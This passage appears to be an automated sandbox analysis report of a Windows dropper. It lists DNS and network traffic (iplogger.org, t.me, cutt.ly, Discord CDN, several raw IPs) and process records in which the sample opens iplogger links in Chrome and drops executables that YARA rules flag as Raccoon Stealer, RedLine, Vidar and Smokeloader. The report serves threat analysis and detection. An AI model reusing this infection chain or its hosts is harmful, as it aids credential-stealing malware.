Aug 23, 2022 18:24:48.078952074 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.078979015 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.081119061 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.081154108 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.082611084 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.082637072 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.085757971 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.085792065 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.087404966 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.087431908 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.089035034 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.089060068 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.091564894 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.091598988 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.092864990 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.092927933 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.094508886 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.094542027 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.096399069 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.096436024 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.097932100 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.097995043 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.100042105 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.100074053 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.102261066 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.102299929 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.103487968 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.103514910 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.105278969 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.105326891 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.109065056 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.109129906 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.109152079 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.109170914 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.110889912 CEST	443	51105	216.58.209.42	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 23, 2022 18:23:33.141156912 CEST	192.168.2.3	8.8.8.8	0x9bd3	Standard query (0)	accounts.google.com	A (IP address)	IN (0x0001)
Aug 23, 2022 18:23:33.151293039 CEST	192.168.2.3	8.8.8.8	0x521d	Standard query (0)	dns.google	A (IP address)	IN (0x0001)
Aug 23, 2022 18:23:33.179774046 CEST	192.168.2.3	8.8.8.8	0xe4e8	Standard query (0)	clients2.google.com	A (IP address)	IN (0x0001)
Aug 23, 2022 18:23:33.206335068 CEST	192.168.2.3	8.8.8.8	0xadaa	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)
Aug 23, 2022 18:23:33.209953070 CEST	192.168.2.3	8.8.8.8	0x2a9c	Standard query (0)	dns.google	A (IP address)	IN (0x0001)
Aug 23, 2022 18:23:33.211716890 CEST	192.168.2.3	8.8.8.8	0x8482	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 23, 2022 18:23:33.350414991 CEST	192.168.2.3	8.8.8.8	0xeba5	Standard query (0)	dns.google	A (IP address)	IN (0x0001)
Aug 23, 2022 18:23:36.420052052 CEST	192.168.2.3	8.8.8.8	0x3c56	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)
Aug 23, 2022 18:23:58.993513107 CEST	192.168.2.3	8.8.8.8	0x1d50	Standard query (0)	t.me	A (IP address)	IN (0x0001)
Aug 23, 2022 18:25:12.625619888 CEST	192.168.2.3	8.8.8.8	0x22a2	Standard query (0)	cutt.ly	A (IP address)	IN (0x0001)
Aug 23, 2022 18:25:14.379508018 CEST	192.168.2.3	8.8.8.8	0x39f1	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Aug 23, 2022 18:25:27.563668966 CEST	192.168.2.3	8.8.8.8	0xc88e	Standard query (0)	t.me	A (IP address)	IN (0x0001)
Aug 23, 2022 18:26:30.177736044 CEST	192.168.2.3	8.8.8.8	0xef86	Standard query (0)	dns.google	A (IP address)	IN (0x0001)
Aug 23, 2022 18:26:57.299451113 CEST	192.168.2.3	8.8.8.8	0x1dd	Standard query (0)	cutt.ly	A (IP address)	IN (0x0001)
Aug 23, 2022 18:26:57.489970922 CEST	192.168.2.3	8.8.8.8	0x2504	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 23, 2022 18:23:33.158418894 CEST	8.8.8.8	192.168.2.3	0x9bd3	No error (0)	accounts.google.com		142.250.180.141	A (IP address)	IN (0x0001)
Aug 23, 2022 18:23:33.168169022 CEST	8.8.8.8	192.168.2.3	0x521d	No error (0)	dns.google		8.8.8.8	A (IP address)	IN (0x0001)
Aug 23, 2022 18:23:33.168169022 CEST	8.8.8.8	192.168.2.3	0x521d	No error (0)	dns.google		8.8.4.4	A (IP address)	IN (0x0001)
Aug 23, 2022 18:23:33.206666946 CEST	8.8.8.8	192.168.2.3	0xe4e8	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)
Aug 23, 2022 18:23:33.206666946 CEST	8.8.8.8	192.168.2.3	0xe4e8	No error (0)	clients.l.google.com		216.58.209.46	A (IP address)	IN (0x0001)
Aug 23, 2022 18:23:33.225227118 CEST	8.8.8.8	192.168.2.3	0xadaa	No error (0)	iplogger.org		148.251.234.83	A (IP address)	IN (0x0001)
Aug 23, 2022 18:23:33.226371050 CEST	8.8.8.8	192.168.2.3	0x2a9c	No error (0)	dns.google		8.8.8.8	A (IP address)	IN (0x0001)
Aug 23, 2022 18:23:33.226371050 CEST	8.8.8.8	192.168.2.3	0x2a9c	No error (0)	dns.google		8.8.4.4	A (IP address)	IN (0x0001)
Aug 23, 2022 18:23:33.239218950 CEST	8.8.8.8	192.168.2.3	0x8482	No error (0)	www.google.com		142.251.209.4	A (IP address)	IN (0x0001)
Aug 23, 2022 18:23:33.369291067 CEST	8.8.8.8	192.168.2.3	0xeba5	No error (0)	dns.google		8.8.8.8	A (IP address)	IN (0x0001)
Aug 23, 2022 18:23:33.369291067 CEST	8.8.8.8	192.168.2.3	0xeba5	No error (0)	dns.google		8.8.4.4	A (IP address)	IN (0x0001)
Aug 23, 2022 18:23:36.439410925 CEST	8.8.8.8	192.168.2.3	0x3c56	No error (0)	iplogger.org		148.251.234.83	A (IP address)	IN (0x0001)
Aug 23, 2022 18:23:59.009830952 CEST	8.8.8.8	192.168.2.3	0x1d50	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)
Aug 23, 2022 18:25:12.646809101 CEST	8.8.8.8	192.168.2.3	0x22a2	No error (0)	cutt.ly		104.22.0.232	A (IP address)	IN (0x0001)
Aug 23, 2022 18:25:12.646809101 CEST	8.8.8.8	192.168.2.3	0x22a2	No error (0)	cutt.ly		172.67.8.238	A (IP address)	IN (0x0001)
Aug 23, 2022 18:25:12.646809101 CEST	8.8.8.8	192.168.2.3	0x22a2	No error (0)	cutt.ly		104.22.1.232	A (IP address)	IN (0x0001)
Aug 23, 2022 18:25:14.400748968 CEST	8.8.8.8	192.168.2.3	0x39f1	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Aug 23, 2022 18:25:14.400748968 CEST	8.8.8.8	192.168.2.3	0x39f1	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Aug 23, 2022 18:25:14.400748968 CEST	8.8.8.8	192.168.2.3	0x39f1	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Aug 23, 2022 18:25:14.400748968 CEST	8.8.8.8	192.168.2.3	0x39f1	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Aug 23, 2022 18:25:14.400748968 CEST	8.8.8.8	192.168.2.3	0x39f1	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Aug 23, 2022 18:25:27.597544909 CEST	8.8.8.8	192.168.2.3	0xc88e	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)
Aug 23, 2022 18:26:30.196505070 CEST	8.8.8.8	192.168.2.3	0xef86	No error (0)	dns.google		8.8.8.8	A (IP address)	IN (0x0001)
Aug 23, 2022 18:26:30.196505070 CEST	8.8.8.8	192.168.2.3	0xef86	No error (0)	dns.google		8.8.4.4	A (IP address)	IN (0x0001)
Aug 23, 2022 18:26:57.320760965 CEST	8.8.8.8	192.168.2.3	0x1dd	No error (0)	cutt.ly		104.22.1.232	A (IP address)	IN (0x0001)
Aug 23, 2022 18:26:57.320760965 CEST	8.8.8.8	192.168.2.3	0x1dd	No error (0)	cutt.ly		172.67.8.238	A (IP address)	IN (0x0001)
Aug 23, 2022 18:26:57.320760965 CEST	8.8.8.8	192.168.2.3	0x1dd	No error (0)	cutt.ly		104.22.0.232	A (IP address)	IN (0x0001)
Aug 23, 2022 18:26:57.508352041 CEST	8.8.8.8	192.168.2.3	0x2504	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Aug 23, 2022 18:26:57.508352041 CEST	8.8.8.8	192.168.2.3	0x2504	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Aug 23, 2022 18:26:57.508352041 CEST	8.8.8.8	192.168.2.3	0x2504	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Aug 23, 2022 18:26:57.508352041 CEST	8.8.8.8	192.168.2.3	0x2504	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Aug 23, 2022 18:26:57.508352041 CEST	8.8.8.8	192.168.2.3	0x2504	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

45.95.11.158

77.91.103.222

88.198.122.116

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 9n6ctoq7cn.exePID: 5608, Parent PID: 504

General

Target ID:	0
Start time:	18:23:13
Start date:	23/08/2022
Path:	C:\Users\user\Desktop\9n6ctoq7cn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\9n6ctoq7cn.exe"
Imagebase:	0x400000
File size:	2700879 bytes
MD5 hash:	1D1C4639EC7BD10BADD41968BC0FF797
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000000.00000003.301588372.0000000002990000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 5968, Parent PID: 5608

General

Target ID:	3
Start time:	18:23:20
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1ARmX4
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 4584, Parent PID: 5608

General

Target ID:	4
Start time:	18:23:20
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AAmX4
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 4648, Parent PID: 5608

General

Target ID:	5
Start time:	18:23:21
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AFmX4
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6196, Parent PID: 5608

General

Target ID:	6
Start time:	18:23:23
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AGmX4
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6244, Parent PID: 4584

General

Target ID:	7
Start time:	18:23:23
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6428, Parent PID: 5968

General

Target ID:	8
Start time:	18:23:24
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1764,i,5049003172737788079,9933990258690121853,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6492, Parent PID: 5608

General

Target ID:	9
Start time:	18:23:24
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AJmX4
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 7200, Parent PID: 5608

General

Target ID:	10
Start time:	18:23:34
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AKmX4
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 7552, Parent PID: 4648

General

Target ID:	11
Start time:	18:23:36
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1824,i,1988256029535633376,615853278931345674,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 7564, Parent PID: 5608

General

Target ID:	12
Start time:	18:23:37
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AZmX4
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 7908, Parent PID: 6196

General

Target ID:	13
Start time:	18:23:39
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1828 --field-trial-handle=1808,i,2619368305235177812,9685674490899924791,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 8032, Parent PID: 5608

General

Target ID:	14
Start time:	18:23:40
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AVmX4
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: F0geI.exePID: 8148, Parent PID: 5608

General

Target ID:	15
Start time:	18:23:42
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\F0geI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Company\NewProduct\F0geI.exe"
Imagebase:	0x400000
File size:	347136 bytes
MD5 hash:	501E0F6FA90340E3D7FF26F276CD582E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000F.00000003.404710161.000000000062F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000F.00000002.469595430.000000000062B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000F.00000003.380590227.0000000000633000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000F.00000003.405187438.000000000062F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000F.00000003.422956483.000000000062A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000F.00000003.362320547.0000000002090000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000F.00000002.466370308.00000000005F8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000F.00000003.400767389.000000000062E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000F.00000003.402599469.000000000062F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000F.00000003.386373584.0000000000631000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 0000000F.00000003.403718026.000000000062F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 64%, Metadefender, Browse Detection: 96%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 8156, Parent PID: 6492

General

Target ID:	16
Start time:	18:23:42
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1772 --field-trial-handle=1808,i,12731814554735541846,5595601299034578970,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6236, Parent PID: 4584

General

Target ID:	17
Start time:	18:23:44
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7024 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: kukurzka9000.exePID: 4560, Parent PID: 5608

General

Target ID:	18
Start time:	18:23:44
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"
Imagebase:	0x400000
File size:	775168 bytes
MD5 hash:	3EC059BD19D6655BA83AE1E644B80510
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 44%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 8220, Parent PID: 7200

General

Target ID:	19
Start time:	18:23:46
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1816,i,10953678208131355352,362896463253549175,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 8424, Parent PID: 8032

General

Target ID:	20
Start time:	18:23:53
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1812,i,7141586697906360246,11009401238799386770,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: namdoitntn.exePID: 8632, Parent PID: 5608

General

Target ID:	21
Start time:	18:23:55
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"
Imagebase:	0x9f0000
File size:	109568 bytes
MD5 hash:	BBD8EA73B7626E0CA5B91D355DF39B7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000000.380265501.00000000009F2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 00000015.00000000.380265501.00000000009F2000.00000002.00000001.01000000.00000007.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 8652, Parent PID: 7564

General

Target ID:	22
Start time:	18:23:56
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1768,i,9353750905984569281,2492682509794733046,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: real.exePID: 8684, Parent PID: 5608

General

Target ID:	23
Start time:	18:23:56
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\real.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Company\NewProduct\real.exe"
Imagebase:	0xd0000
File size:	290304 bytes
MD5 hash:	E0C8728412F5F7E97698C72DA925C5E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000017.00000000.382727535.0000000000104000.00000002.00000001.01000000.0000000A.sdmp, Author: unknown Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000017.00000002.460179149.0000000000104000.00000002.00000001.01000000.0000000A.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\real.exe, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML

Show Windows behavior
